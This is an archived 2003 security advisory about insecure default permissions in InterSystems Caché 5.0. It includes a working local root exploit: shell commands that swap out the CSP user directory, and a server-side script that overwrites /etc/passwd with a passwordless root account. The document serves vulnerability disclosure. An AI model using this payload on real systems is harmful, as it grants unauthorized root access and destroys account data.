[UNIX] Intersystems Cache' Database Two Local Root Vulnerabilities

• Previous message: SecuriTeam: "[TOOL] Multimap - Multithreaded Wrapper for NMap"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 24 Aug 2003 17:27:39 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Intersystems Cache' Database Two Local Root Vulnerabilities
------------------------------------------------------------------------

SUMMARY

" <http://www.intersystems.com> Cache', the post-relational database for
e-applications, is optimized for the tougher demands of Web applications.
It delivers breakthrough performance for massively scalable Web
applications. Its rapid application development environment with advanced
object technology lets you operate at Internet speed. Cache's ultra-fast
SQL outperforms relational systems 20X. And its multidimensional
application and data server delivers lightning-fast performance."

The default installation of the Cache database yields poorly protected
files and directories in the main package tree. Directories and files are
open to all users as read write and execute.

DETAILS

Vulnerable systems:
 * Cache' Database version 5.0

Local attackers can exploit this to manipulate directories and binaries
inside the installation tree. This may be used by a local malicious user
to gain root access. The content in /cachesys/csp/user is executed as root
through the web interface. user's parent directory (csp) is world
writeable allowing a local non root user to move user aside, copy its
contents and create a new writeable user directory.

mv /cachesys/csp/user /cachesys/csp/user.old
cp -rp /cachesys/csp/user /cachesys/csp/user.old
cp cspexp.csp /cachesys/csp/user
lnyx http://localhost/csp/user/cspexp.csp
su - cache

<------------------cspexp.csp------------->

< html>

Intersystems Cache' local root exploit. Larry W. Cashdollar
http://vapid.dhs.org

Because of poor default file and directory permissions a local user can
execute code as root via the cache CSP interpreter. <HR>
Attempting to overwrite /etc/passwd with cache::0:0:root:/root:/bin/bash.

< script language=Cache runat=server>

     Set cdef=##class(%Library.File).%New("/etc/passwd")
     Do cdef.Open("WSN")
     Do cdef.WriteLine("cache::0:0:root:/root:/bin/bash")
     Do cdef.%Close()

</script>

</html>

<------------------cspexp.csp------------->

Vendor response:
See <http://www.intersystems.com/support/flash/index.html>
http://www.intersystems.com/support/flash/index.html for additional
details.

ADDITIONAL INFORMATION

The original advisory can be downloaded from:
<http://vapid.dhs.org/cache.html> http://vapid.dhs.org/cache.html.

The information has been provided by Larry W. Cashdollar.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[TOOL] Multimap - Multithreaded Wrapper for NMap"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]